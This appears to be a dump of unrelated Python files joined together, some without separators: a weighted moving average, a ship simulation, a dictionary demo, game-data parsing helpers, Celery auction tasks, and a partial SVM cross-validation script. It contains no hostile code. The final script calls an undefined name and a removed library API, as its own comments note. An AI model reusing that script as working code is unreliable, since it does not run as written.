    # Fibonacci-derived weights applied across each sliding window of
    # `period` source values (sliding_window_view needs NumPy >= 1.20).
    fibs = fibonacci(n=period)
    swv = sliding_window_view(source, window_shape=period)
    res = np.average(swv, weights=fibs, axis=-1)
    # Sequential output is left-padded with NaN so it aligns with `candles`;
    # otherwise only the most recent value is returned.
    return np.concatenate((np.full((candles.shape[0] - res.shape[0]), np.nan), res), axis=0) if sequential else res[-1]
def fibonacci(n: int = 2) -> np.ndarray:
    """Return the first n Fibonacci numbers (1, 1, 2, 3, 5, ...) normalized
    so the weights sum to 1.

    Negative n falls back to 2, matching the original behaviour.
    """
    n = int(fabs(n)) if n >= 0 else 2
    # Build the sequence in a Python list, then convert once; the old
    # per-element np.append reallocated the array on every iteration (O(n^2)).
    seq = [1]
    a, b = 1, 1
    for _ in range(n - 1):
        a, b = b, a + b
        seq.append(a)
    result = np.asarray(seq, dtype=float)
    # The sum is always >= 1 (every element is a positive integer), so the
    # old `if fib_sum > 0` guard was dead code.
    return result / result.sum()
|
from src.manoeuvringModel import manoeuverShip
import math
from matplotlib import patches
class Simulation:
    """Drives the SimPy-based ship manoeuvring simulation for a world.

    NOTE(review): `activeShips` is a mutable *class* attribute, so it is
    shared by all Simulation instances — confirm single-instance usage.
    """
    activeShips = {}

    def __init__(self, world):
        self.world = world
        self.env = world.env
        # Load Scenarios/<experimentName>.py and run its `initial(self)` hook
        # to populate the simulation.
        module = __import__("Scenarios.%s" % self.world.experimentName, globals(), locals(), ['object'], 1)
        initial = getattr(module, "initial")
        initial(self)
        print("Created environment for simulation")
        self.env.process(self.runSimulation())
        # self.env.process(self.updateRadio())
        self.env.process(self.updateGUI())

    def runSimulation(self):
        """Main SimPy process: move ships, update statistics, redraw, repeat."""
        self.world.log("Simulation started")
        while True:
            for shipname in self.activeShips:
                self.moveShip(shipname)
            for shipname in self.activeShips:
                self.updateStatistics(shipname)
            self.world.viewer.updatePlot()
            # One tick of simulated time per update.
            yield self.env.timeout(self.world.secondsPerStep/self.world.updateFrequency)

    def updateGUI(self):
        """SimPy process that pumps the Tk event loop every 1/30 time unit."""
        while True:
            self.world.root.update()
            yield self.env.timeout(1/30)

    def updateRadio(self):
        # NOTE(review): this method contains no `yield`, so it is NOT a
        # generator and would spin forever if handed to env.process(); the
        # corresponding call in __init__ is commented out.
        while True:
            for shipname in self.activeShips:
                self.activeShips[shipname].AIS.sendMessage(self.env.now)

    def addDynamicObject(self, objectName, location, course_deg, speed=None, rudderAngle=0, firstWaypoint=None):
        """Activate a world object in the simulation with an initial state.

        When *speed* is None the ship's mean speed is used. Telegraph speed
        is derived as (v / vmax)^2 in both branches.
        """
        ship = self.world.do[objectName]
        ship.location = location
        ship.course = course_deg
        ship.heading = course_deg
        ship.rudderAngle = rudderAngle
        if speed is None:
            ship.speed = ship.vmean
            ship.telegraphSpeed = (ship.speed / ship.vmax) ** 2
            ship.acceleration = 0
        else:
            ship.speed = speed
            ship.telegraphSpeed = (ship.speed / ship.vmax) ** 2
            ship.acceleration = 0
        if firstWaypoint is None:
            pass
        else:
            ship.waypoints.append(firstWaypoint)
        ship.AIS.update(ship, time=self.env.now)
        self.activeShips[objectName] = ship

    def removeDynamicObject(self, objectName):
        """Zero a ship's state, deactivate it and remove its plot artists."""
        ship = self.world.do[objectName]
        ship.location = [0, 0]
        ship.course = 0
        ship.heading = 0
        ship.drift = 0
        ship.speed = 0
        ship.acceleration = 0
        ship.headingChange = 0
        ship.telegraphSpeed = 0
        ship.rudderAngle = 0
        del self.activeShips[objectName]
        # Each artist may or may not exist / already be detached, hence the
        # individual try/except blocks.
        try:
            ship.markerPlot.remove()
        except AttributeError:
            pass
        try:
            ship.scalarPlot.remove()
        except AttributeError:
            pass
        except ValueError:
            pass
        try:
            ship.polygonPlot.remove()
        except AttributeError:
            pass
        try:
            ship.tag.remove()
        except AttributeError:
            pass

    def moveShip(self, objectName):
        """Advance one ship by the elapsed sim time since its last update."""
        ship = self.activeShips[objectName]
        # Update timestamp and get time since last update
        dt = self.env.now - ship.lastUpdate
        ship.lastUpdate = self.env.now
        # Use model to move ship
        if ship.speed != 0:
            manoeuverShip(ship, dt)
        if ship.waypoints:
            ship.adjustRudder()

    def updateStatistics(self, objectName):
        """Track per-pair closest point of approach and log near misses."""
        shipA = self.activeShips[objectName]
        # Calculate closest point of approach
        for shipname in self.activeShips:
            if shipA is not self.activeShips[shipname]:
                shipB = self.activeShips[shipname]
                d = math.hypot(shipA.location[0]-shipB.location[0], shipA.location[1]-shipB.location[1])
                try:
                    shipA.perceivedShipCPA[shipB] = min(shipA.perceivedShipCPA[shipB], d)
                except KeyError:
                    shipA.perceivedShipCPA[shipB] = d
                # 1875 m proximity threshold triggers a log entry.
                if d < 1875:
                    self.world.log("%s and %s are too close (%d meter)" % (shipA.name, shipB.name, d))

    @staticmethod
    def createLandPatch(polygon):
        """Return a matplotlib polygon patch styled as land."""
        patch = patches.Polygon(polygon)
        patch.set_color("olive")
        patch.set_alpha(0.8)
        return patch

    @staticmethod
    def createDangerPatch(polygon):
        """Return a matplotlib polygon patch styled as a danger area."""
        patch = patches.Polygon(polygon)
        patch.set_color("crimson")
        patch.set_alpha(0.2)
        return patch

    @staticmethod
    def createDangerLinePatch(polygon):
        """Return a matplotlib polygon outline styled as a danger boundary."""
        patch = patches.Polygon(polygon)
        patch.set_linestyle("dashed")
        patch.set_edgecolor("crimson")
        return patch
# Demonstration of basic dict operations with mixed int/str keys.
# (The old leading `dicionario = dict()` was dead code — the next line
# rebound the name immediately — so it has been removed.)
dicionario = {1: "oi", 2: "olá", 3: "hello", "C": 9}
print(dicionario)
print(dicionario.keys())
print(dicionario.values())
# Replace the value stored under the int key 2.
dicionario[2] = "oláá"
print(dicionario)
for chave in dicionario:
    print(dicionario[chave])
for chave, valor in dicionario.items():
    print(chave,"-",valor)
# update() overwrites existing keys (int 2) and adds new ones (str "1").
dicionario.update({"1": 55, 2: "olá de novo"})
print(dicionario)
import datetime
import json
import re
import pytz
from .dungeon_types import DUNGEON_TYPE_COMMENTS
def strip_colors(message: str) -> str:
    """Remove inline $rrggbb$ / ^rrggbb^ color codes from a message.

    FIX: the parameter annotation said ``int`` but the argument is a string
    (it is passed straight to re.sub as the subject text).
    """
    return re.sub(r'(?i)[$^][a-f0-9]{6}[$^]', '', message)
def ghmult(x: int) -> str:
    """Format a raw multiplier (stored x10000) as e.g. '2x' or '1.5x'."""
    value = x / 10000
    if value == int(value):
        # Drop the trailing '.0' for whole-number multipliers.
        value = int(value)
    return '%sx' % value
def ghmult_plain(x: int) -> str:
    """Format a raw multiplier (stored x10000) without the 'x' suffix."""
    value = x / 10000
    if value == int(value):
        # Drop the trailing '.0' for whole-number multipliers.
        value = int(value)
    return '{}'.format(value)
def ghchance(x: int) -> str:
    """Format a basis-point value (x/100) as a percentage string like '25%'."""
    assert x % 100 == 0
    percent = x // 100
    return '%d%%' % percent
def ghchance_plain(x: int) -> str:
    """Format a basis-point value (x/100) as a bare number, e.g. '25'.

    FIX: the old format string ``'%d%'`` ends with a lone '%' and raised
    ``ValueError: incomplete format`` on every call. The '_plain' variants
    omit decorations (cf. ghmult_plain), so the correct format is ``'%d'``.
    """
    assert x % 100 == 0
    return '%d' % (x // 100)
def ghtime(time_str: str, server: str) -> datetime.datetime:
    """Parse a GungHo 'yymmddHHMMSS' string into an aware datetime.

    e.g. '151228000000' -> 2015-12-28 00:00:00 in the server's fixed offset
    ('na' is UTC-8, 'jp'/'ja' is UTC+9).
    """
    server = server.lower()
    if server == 'ja':
        server = 'jp'
    tz_offsets = {
        'na': '-0800',
        'jp': '+0900',
    }
    stamped = '{} {}'.format(time_str, tz_offsets[server])
    return datetime.datetime.strptime(stamped, '%y%m%d%H%M%S %z')
def gh_to_timestamp(time_str: str, server: str) -> int:
    """Convert a GungHo time string on the given server to a Unix timestamp."""
    return int(ghtime(time_str, server).timestamp())
def datetime_to_gh(dt):
    """Format a datetime (assumed to carry the right timezone) as yymmddHHMMSS."""
    formatted = dt.strftime('%y%m%d%H%M%S')
    return formatted
class NoDstWestern(datetime.tzinfo):
    """Fixed UTC-8 timezone with no daylight-saving adjustment.

    Used for NA server times, which do not observe DST.
    """

    def utcoffset(self, *dt):
        # Fixed offset: always 8 hours behind UTC.
        return datetime.timedelta(hours=-8)

    def tzname(self, dt):
        return "NoDstWestern"

    def dst(self, dt):
        # FIX: per the tzinfo contract, dst() returns the DST *adjustment*,
        # not the UTC offset. This zone has no DST, so it is always zero;
        # the old code wrongly returned timedelta(hours=-8).
        return datetime.timedelta(0)
def cur_gh_time(server):
    """Return the current wall-clock time on the given server ('na' fixed
    UTC-8, 'jp'/'ja' Asia/Tokyo) formatted as a yymmddHHMMSS string."""
    server = server.lower()
    server = 'jp' if server == 'ja' else server
    tz_offsets = {
        'na': NoDstWestern(),
        'jp': pytz.timezone('Asia/Tokyo'),
    }
    return datetime_to_gh(datetime.datetime.now(tz_offsets[server]))
def internal_id_to_display_id(i_id: int) -> str:
    """Permute the 9 digits of an internal PAD ID into display order."""
    digits = str(i_id).zfill(9)
    # Fixed 1-based digit permutation used by the game client.
    order = (1, 5, 9, 6, 3, 8, 2, 4, 7)
    return ''.join(digits[pos - 1] for pos in order)
def display_id_to_group(d_id: str) -> str:
    """Map a display ID's third digit (mod 5) to a group letter 'a'-'e'."""
    group_index = int(d_id[2]) % 5
    return chr(ord('a') + group_index)
def internal_id_to_group(i_id: str) -> str:
    """Map an internal ID (mod 5) to a group letter 'a'-'e'."""
    group_index = int(i_id) % 5
    return chr(ord('a') + group_index)
class JsonDictEncodable(json.JSONEncoder):
    """Utility parent class that makes the child JSON encodable."""

    def default(self, o):
        # Serialize any otherwise-unserializable object via its attribute dict.
        return o.__dict__

    def __str__(self):
        return str(self.__dict__)
# TODO: fold these ranges directly into a dictionary; several distinct ranges
# map to a single comment and are unnecessarily delineated below.
def get_dungeon_comment(val: int) -> str:
    """Map a raw dungeon-type value to its human-readable comment string."""
    # Ordered (range, comment) pairs; first match wins, mirroring the old
    # if/elif chain exactly (the `or` of two ranges became two entries).
    ranged_comments = (
        (range(5611, 5615), "Retired Special Dungeons"),  # last normal dungeons
        (range(21612, 21618), "Technical"),
        (range(38901, 38912), "Descended (original)"),
        (range(200101, 200111), "Alt. Technial"),
        (range(200021, 200057), "Technical"),
        (range(200301, 200306), "Special Decended"),
        (range(200201, 200206), "Special Decended"),
    )
    for span, comment in ranged_comments:
        if val in span:
            return comment
    if val in DUNGEON_TYPE_COMMENTS:
        return DUNGEON_TYPE_COMMENTS[val]
    return "No Data"
class Multiplier:
    """Mutable container for HP/ATK/RCV multipliers and a shield fraction."""

    def __init__(self):
        # All stat multipliers start neutral; shield starts at no reduction.
        self.hp = self.atk = self.rcv = 1.0
        self.shield = 0.0
def parse_skill_multiplier(skill, other_fields, length) -> Multiplier:
    """Decode one leader-skill record into aggregate stat multipliers.

    skill        -- numeric leader-skill type ID
    other_fields -- the skill's raw data fields (percent-scaled ints; the
                    get_last/get_second_last/get_third_last helpers divide
                    by 100)
    length       -- number of meaningful entries in other_fields; for many
                    skill types it selects which field layout applies

    Returns a Multiplier whose hp/atk/rcv are multiplicative factors and
    whose shield is a damage-reduction fraction.

    NOTE(review): the per-skill field layouts below are reverse-engineered
    from the raw data format; the positional indices are taken on faith
    and should be confirmed against the game data dumps.
    """
    multipliers = Multiplier()
    # Shield only
    if skill == 3:
        multipliers.shield = get_last(other_fields)
    # Attack boost only
    elif skill in [11, 22, 26, 31, 40, 66, 69, 88, 90, 92, 94, 95, 96, 97, 101, 104, 109, 150]:
        multipliers.atk *= get_last(other_fields)
    # HP boost only
    elif skill in [23, 30, 48, 107]:
        multipliers.hp *= get_last(other_fields)
    # RCV boost only
    elif skill in [24, 49, 149]:
        multipliers.rcv *= get_last(other_fields)
    # RCV and ATK
    elif skill in [28, 64, 75, 79, 103]:
        multipliers.atk *= get_last(other_fields)
        multipliers.rcv *= get_last(other_fields)
    # All stat boost
    elif skill in [29, 65, 76, 114]:
        multipliers.hp *= get_last(other_fields)
        multipliers.atk *= get_last(other_fields)
        multipliers.rcv *= get_last(other_fields)
    elif skill in [16, 17, 36, 38, 43]:
        multipliers.shield = get_last(other_fields)
    elif skill in [39]:
        # ATK always; field [2] == 2 flags an additional RCV boost.
        multipliers.atk *= get_last(other_fields)
        if other_fields[2] == 2:
            multipliers.rcv *= get_last(other_fields)
    elif skill == 44:
        # Field [1] selects which stats the boost applies to.
        if other_fields[1] == 1:
            multipliers.atk *= get_last(other_fields)
        elif other_fields[1] == 2:
            multipliers.rcv *= get_last(other_fields)
        elif other_fields[1] == 3:
            multipliers.atk *= get_last(other_fields)
            multipliers.rcv *= get_last(other_fields)
    elif skill in [45, 62, 73, 77, 111]:
        multipliers.hp *= get_last(other_fields)
        multipliers.atk *= get_last(other_fields)
    elif skill == 46:
        multipliers.hp *= get_last(other_fields)
    elif skill == 50:
        if other_fields[1] == 5:
            multipliers.rcv *= get_last(other_fields)
        else:
            multipliers.atk *= get_last(other_fields)
    elif skill == 86:
        if length == 4:
            multipliers.hp *= get_last(other_fields)
    # rainbow parsing
    elif skill == 61:
        # Scaling ATK per matched attribute count; r_type encodes the
        # attribute bitmask (31 = 5 attrs, 63 = 5 attrs + heal).
        if length == 3:
            multipliers.atk *= get_last(other_fields)
        elif length == 4:
            r_type = other_fields[0]
            if r_type == 31:
                mult = get_second_last(other_fields) + \
                    get_last(other_fields) * (5 - other_fields[1])
                multipliers.atk *= mult
            elif r_type % 14 == 0:
                multipliers.atk *= get_second_last(other_fields) + get_last(other_fields)
            else:
                # r_type is 63
                mult = get_second_last(other_fields) + \
                    (get_last(other_fields)) * (6 - other_fields[1])
                multipliers.atk *= mult
        elif length == 5:
            if other_fields[-1] <= other_fields[1]:
                if other_fields[0] == 31:
                    multipliers.atk *= get_third_last(other_fields) + (5 - other_fields[1]) * get_second_last(
                        other_fields)
                if other_fields[0] == 63:
                    multipliers.atk *= get_third_last(other_fields) + (6 - other_fields[1]) * get_second_last(
                        other_fields)
            else:
                multipliers.atk *= get_third_last(other_fields) + (
                    other_fields[-1] - other_fields[1]) * get_second_last(other_fields)
    elif skill in [63, 67]:
        multipliers.hp *= get_last(other_fields)
        multipliers.rcv *= get_last(other_fields)
    elif skill == 98:
        # Base multiplier plus a per-step bonus between min and max combos.
        if length > 0:
            multipliers.atk *= get_third_last(other_fields) + (other_fields[3] - other_fields[0]) * get_second_last(
                other_fields)
    elif skill == 100:
        if other_fields[0] != 0:
            multipliers.atk *= get_last(other_fields)
        if other_fields[1] != 0:
            multipliers.rcv *= get_last(other_fields)
    elif skill == 105:
        multipliers.atk *= get_last(other_fields)
        multipliers.rcv *= get_mult(other_fields[0])
    elif skill in [106, 108]:
        multipliers.atk *= get_last(other_fields)
        multipliers.hp *= get_mult(other_fields[0])
    elif skill in [119, 159]:
        if length == 3:
            multipliers.atk *= get_last(other_fields)
        elif length == 5:
            multipliers.atk *= get_third_last(other_fields) + (
                (other_fields[4] - other_fields[1]) * (get_second_last(other_fields)))
    elif skill == 121:
        # Field count determines which of hp/atk/rcv are present; a stored
        # 0 means "no boost" and must not zero out the multiplier.
        if length == 3:
            if get_last(other_fields) != 0:
                multipliers.hp *= get_last(other_fields)
        elif length == 4:
            multipliers.atk *= get_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
        elif length == 5:
            if get_third_last(other_fields) != 0:
                multipliers.hp *= get_third_last(other_fields)
            if get_second_last(other_fields):
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
    elif skill == 122:
        if length == 4:
            multipliers.atk = get_last(other_fields)
        else:
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
    elif skill == 123:
        if length == 4:
            multipliers.atk *= get_last(other_fields)
        elif length == 5:
            multipliers.atk *= get_second_last(other_fields)
            multipliers.rcv *= get_last(other_fields)
    elif skill == 124:
        # Multi-color match: fields [0..4] list required orb colors.
        if length == 7:
            multipliers.atk *= get_last(other_fields)
        elif length == 8:
            max_combos = 0
            for i in range(0, 5):
                if other_fields[i] != 0:
                    max_combos += 1
            scale = get_last(other_fields)
            c_count = other_fields[5]
            multipliers.atk *= get_second_last(other_fields) + scale * (max_combos - c_count)
    elif skill == 125:
        if length == 6:
            if get_last(other_fields) != 0:
                multipliers.hp *= get_last(other_fields)
        elif length == 7:
            multipliers.atk *= get_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
        elif length == 8:
            if other_fields[-2] != 0:
                multipliers.atk *= get_second_last(other_fields)
            if other_fields[-1] != 0:
                multipliers.rcv *= get_last(other_fields)
            if other_fields[-3] != 0:
                multipliers.hp *= get_third_last(other_fields)
    elif skill == 129:
        if length == 3:
            if get_last(other_fields) != 0:
                multipliers.hp *= get_last(other_fields)
        elif length == 4:
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
            multipliers.atk *= get_last(other_fields)
        elif length == 5:
            if get_third_last(other_fields) != 0:
                multipliers.hp *= get_third_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
        elif length == 7:
            if get_mult(other_fields[2]) != 0:
                multipliers.hp *= get_mult(other_fields[2])
            if get_mult(other_fields[3]) != 0:
                multipliers.atk *= get_mult(other_fields[3])
            if get_mult(other_fields[4]) != 0:
                multipliers.rcv *= get_mult(other_fields[4])
            if get_last(other_fields) != 0:
                multipliers.shield = get_last(other_fields)
    elif skill == 130:
        if length == 4:
            multipliers.atk *= get_last(other_fields)
        elif length == 5:
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
        elif length == 7:
            if get_mult(other_fields[2]) != 0:
                multipliers.hp *= get_mult(other_fields[2])
            if get_mult(other_fields[3]) != 0:
                multipliers.atk *= get_mult(other_fields[3])
            if get_mult(other_fields[4]) != 0:
                multipliers.rcv *= get_mult(other_fields[4])
            if get_last(other_fields) != 0:
                multipliers.shield = get_last(other_fields)
    elif skill == 131:
        if length == 4:
            multipliers.atk *= get_last(other_fields)
        elif length == 7:
            if get_mult(other_fields[2]) != 0:
                multipliers.hp *= get_mult(other_fields[2])
            if get_mult(other_fields[3]) != 0:
                multipliers.atk *= get_mult(other_fields[3])
            if get_mult(other_fields[4]) != 0:
                multipliers.rcv *= get_mult(other_fields[4])
            if get_last(other_fields) != 0:
                multipliers.shield = get_last(other_fields)
    elif skill == 133:
        if length == 3:
            multipliers.atk *= get_last(other_fields)
        elif length == 4:
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            multipliers.rcv *= get_last(other_fields)
    elif skill == 136:
        # Dual-condition skills: two independent stat blocks are combined.
        if length == 6:
            multipliers.atk *= get_mult(other_fields[2])
            if get_last(other_fields) > 1:
                multipliers.hp *= get_last(other_fields)
        elif length == 7:
            multipliers.atk *= get_mult(other_fields[2]) * get_last(other_fields)
        elif length == 8:
            if get_mult(other_fields[2]) > 1:
                multipliers.atk *= get_mult(other_fields[2])
            if get_mult(other_fields[1]) > 1:
                multipliers.hp *= get_mult(other_fields[1])
            if get_mult(other_fields[3]) > 1:
                multipliers.rcv *= get_mult(other_fields[3])
            if get_second_last(other_fields) > 1:
                multipliers.atk *= get_second_last(other_fields)
            if get_third_last(other_fields) > 1:
                multipliers.hp *= get_third_last(other_fields)
            if get_last(other_fields) > 1:
                multipliers.rcv *= get_last(other_fields)
    elif skill == 137:
        if length == 6:
            multipliers.atk *= get_mult(other_fields[2])
            multipliers.hp *= get_last(other_fields)
        elif length == 7:
            if other_fields[1] != 0:
                multipliers.hp *= get_mult(other_fields[1])
            multipliers.atk *= get_mult(other_fields[2]) * get_last(other_fields)
            if other_fields[3] != 0:
                multipliers.rcv *= get_mult(other_fields[3])
        elif length == 8:
            if get_mult(other_fields[1]) != 0:
                multipliers.hp *= get_mult(other_fields[1])
            if get_mult(other_fields[2]) != 0:
                multipliers.atk *= get_mult(other_fields[2])
            if get_mult(other_fields[3]) != 0:
                multipliers.rcv *= get_mult(other_fields[3])
            if get_third_last(other_fields) != 0:
                multipliers.hp *= get_third_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
    elif skill == 139:
        if length == 5:
            multipliers.atk *= get_last(other_fields)
        if length == 7 or length == 8:
            # Two HP-threshold branches; report the better ATK of the two.
            multipliers.atk *= max(get_mult(other_fields[4]), get_last(other_fields))
    elif skill == 151:
        if other_fields[0] != 0:
            multipliers.atk *= get_mult(other_fields[0])
        multipliers.shield = get_last(other_fields)
    elif skill == 155:
        if length == 4:
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
            multipliers.atk *= get_last(other_fields)
        elif length == 5:
            if get_third_last(other_fields) != 0:
                multipliers.hp *= get_third_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
    elif skill == 156:
        # Field [-2] selects the boost kind: 2 = ATK, 3 = shield.
        if length > 0:
            check = other_fields[-2]
            if check == 2:
                multipliers.atk *= get_last(other_fields)
            if check == 3:
                multipliers.shield = get_last(other_fields)
    elif skill == 157:
        # Cross matches: the per-cross multiplier stacks (2 or 3 crosses).
        if length == 2:
            multipliers.atk *= get_last(other_fields) ** 2
        if length == 4:
            multipliers.atk *= get_last(other_fields) ** 3
        if length == 6:
            multipliers.atk *= get_last(other_fields) ** 3
    elif skill == 158:
        if length == 4:
            multipliers.atk *= get_last(other_fields)
        elif length == 5:
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.atk *= get_last(other_fields)
        elif length == 6:
            if get_third_last(other_fields) != 0:
                multipliers.rcv *= get_third_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.atk *= get_last(other_fields)
    elif skill == 163:
        if length == 4:
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
            multipliers.atk *= get_last(other_fields)
        if length == 5:
            if get_third_last(other_fields) != 0:
                multipliers.hp *= get_third_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
        if length == 6 or length == 7:
            multipliers.shield = get_last(other_fields)
    elif skill == 164:
        if length == 7:
            multipliers.atk *= get_second_last(other_fields)
            multipliers.rcv *= get_last(other_fields)
        if length == 8:
            multipliers.atk *= get_third_last(other_fields)
            multipliers.rcv *= get_second_last(other_fields)
            # Field [4] selects which stats receive the additive bonus.
            if other_fields[4] == 1:
                multipliers.atk += get_last(other_fields)
                multipliers.rcv += get_last(other_fields)
            elif other_fields[4] == 2:
                multipliers.atk += get_last(other_fields)
    elif skill == 165:
        if length == 4:
            multipliers.atk *= get_second_last(other_fields)
            multipliers.rcv *= get_last(other_fields)
        if length == 7:
            multipliers.atk *= get_mult(other_fields[2]) + \
                get_third_last(other_fields) * other_fields[-1]
            multipliers.rcv *= get_mult(other_fields[3]) + \
                get_second_last(other_fields) * other_fields[-1]
    elif skill == 166:
        multipliers.atk *= get_mult(other_fields[1]) + (other_fields[-1] - other_fields[0]) * get_third_last(
            other_fields)
        multipliers.rcv *= get_mult(other_fields[2]) + (other_fields[-1] - other_fields[0]) * get_second_last(
            other_fields)
    elif skill == 167:
        if length == 4:
            multipliers.atk *= get_second_last(other_fields)
            multipliers.rcv *= get_last(other_fields)
        elif length == 7:
            diff = other_fields[-1] - other_fields[1]
            multipliers.atk *= get_mult(other_fields[2]) + diff * get_third_last(other_fields)
            multipliers.rcv *= get_mult(other_fields[3]) + diff * get_second_last(other_fields)
    elif skill in [169, 170, 171, 182]:
        if length > 0:
            if get_second_last(other_fields) > 1:
                multipliers.atk *= get_second_last(other_fields)
            multipliers.shield = get_last(other_fields)
    elif skill == 175:
        if length == 5:
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
            multipliers.atk *= get_last(other_fields)
        if length == 6:
            if get_third_last(other_fields) != 0:
                multipliers.hp *= get_third_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
    elif skill == 177:
        if length == 7:
            multipliers.atk *= get_last(other_fields)
        elif length == 8:
            multipliers.atk *= get_second_last(other_fields) + \
                other_fields[-3] * get_last(other_fields)
    elif skill in [178, 185]:
        if length == 4:
            multipliers.hp *= get_last(other_fields)
        elif length == 5:
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
            multipliers.atk *= get_last(other_fields)
        elif length == 6:
            if get_third_last(other_fields) != 0:
                multipliers.hp *= get_third_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
    elif skill == 183:
        if length == 4 or length == 7:
            multipliers.atk *= get_last(other_fields)
        elif length == 5:
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            multipliers.shield = get_last(other_fields)
        elif length == 8:
            multipliers.atk *= max(get_mult(other_fields[3]), get_second_last(other_fields))
            multipliers.rcv *= max(get_mult(other_fields[4]), get_last(other_fields))
    elif skill == 186:
        if length == 4:
            if get_second_last(other_fields) != 0:
                multipliers.hp *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.atk *= get_last(other_fields)
        elif length == 5:
            if get_third_last(other_fields) != 0:
                multipliers.hp *= get_third_last(other_fields)
            if get_second_last(other_fields) != 0:
                multipliers.atk *= get_second_last(other_fields)
            if get_last(other_fields) != 0:
                multipliers.rcv *= get_last(other_fields)
    return multipliers
def get_mult(val):
    """Convert a raw percent-scaled value (e.g. 150) to a multiplier (1.5)."""
    multiplier = val / 100
    return multiplier
def get_last(other_fields):
    """Return the final field scaled from percent to a multiplier.

    Falls back to the identity value 1 when the list is empty.
    """
    if other_fields:  # idiomatic truthiness instead of len(...) != 0
        return other_fields[-1] / 100
    return 1
def get_second_last(other_fields):
    """Return the second-to-last field scaled from percent to a multiplier.

    Bug fix: the original only guarded against an empty list, so a
    single-element list raised IndexError on other_fields[-2]. Any list
    shorter than two elements now falls back to the identity value 1,
    matching the fallback get_last uses.
    """
    if len(other_fields) >= 2:
        return other_fields[-2] / 100
    return 1
def get_third_last(other_fields):
    """Return the third-to-last field scaled from percent to a multiplier.

    Bug fix: the original only guarded against an empty list, so lists
    with fewer than three elements raised IndexError on other_fields[-3].
    Short lists now fall back to the identity value 1.
    """
    if len(other_fields) >= 3:
        return other_fields[-3] / 100
    return 1
|
17,038 | ddf18ac8eed85cf890e0465d7b58268354848eec | import datetime
from myflaskapp import celery
from models.model import Auction
from controllers.auction_controller import AuctionController
from celery import chain
from celery.result import AsyncResult
def set_countdown(id, delay):
    """Schedule auction *id* to activate, then auto-deactivate.

    Chains two Celery tasks: set_active fires at eta=delay
    (NOTE(review): despite the name, *delay* is passed as an absolute
    `eta`, not a relative countdown — confirm callers pass a datetime),
    and deactivate runs 10 seconds after activation.
    Returns the chain's AsyncResult.
    """
    return chain(set_active.si(id).set(eta=delay), deactivate.si(id).set(countdown=10))()
@celery.task()
def set_active(id):
    '''
    Called when an auction first becomes active, and when the end time for an auction is reached,
    and then takes actions to maintain the state of the auction properly.
    '''
    # if this is the first heartbeat, take care of activating the auction
    auction = Auction.query.filter_by(id=id).first()
    # NOTE(review): .first() returns None for an unknown id, which would
    # raise AttributeError below — confirm ids are always valid here.
    auction.active = True
    auction.put()
@celery.task(bind=True)
def deactivate(self, id):
    """Close auction *id*, or retry in 10s while autobidders are active.

    Invokes any pending autobidders; if none fired, the auction is
    closed. Otherwise the task reschedules itself so the auction stays
    open while automatic bids keep coming in.
    """
    auction = Auction.query.filter_by(id=id).first()
    if not AuctionController.invoke_autobidders(auction):
        AuctionController.close_auction(auction)
    else:
        # Bug fix: apply_async expects args as a tuple/list; `(id)` is
        # just a parenthesized int. Pass a proper 1-tuple.
        self.apply_async((id,), countdown=10)
@celery.task
def cancel(task_id):
    """Revoke the scheduled Celery task identified by *task_id*."""
    AsyncResult(task_id).revoke()
17,039 | 63ef831df8ea4c5053e0112e70ab41244d7c775f | import pickle
from sklearn.cross_validation import KFold
import numpy as np
import svm_classify as svm
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.preprocessing import normalize
import load_data as ld
import load_data as Tokenizer
from sklearn.metrics import accuracy_score
# Cross-validate an SVM text classifier over design-matrix variants
# (raw counts / tf-idf / L1-normalized), C values, kernels, and poly degrees.
# NOTE(review): this is Python 2 code (print statements, old sklearn
# cross_validation API) and appears unrunnable as-is — see notes below.
DESIGN_MATRIX_PATH = 'pure_counts_df5.pkl'
# NOTE(review): file handle is opened in text mode and never closed;
# binary mode is usually required for pickle.
X, vectorizer = pickle.load(open(DESIGN_MATRIX_PATH))
# NOTE(review): `document_paths` is undefined here — probably meant
# ld.document_paths('train').
y = ld.get_labels(document_paths('train'))
words = vectorizer.get_feature_names()
X = X.toarray()
X, words = ld.remove_numerals(X, words)
X, words = ld.lemmatize_design_matrix(X, words)
kf = KFold(X.shape[0], n_folds=5)
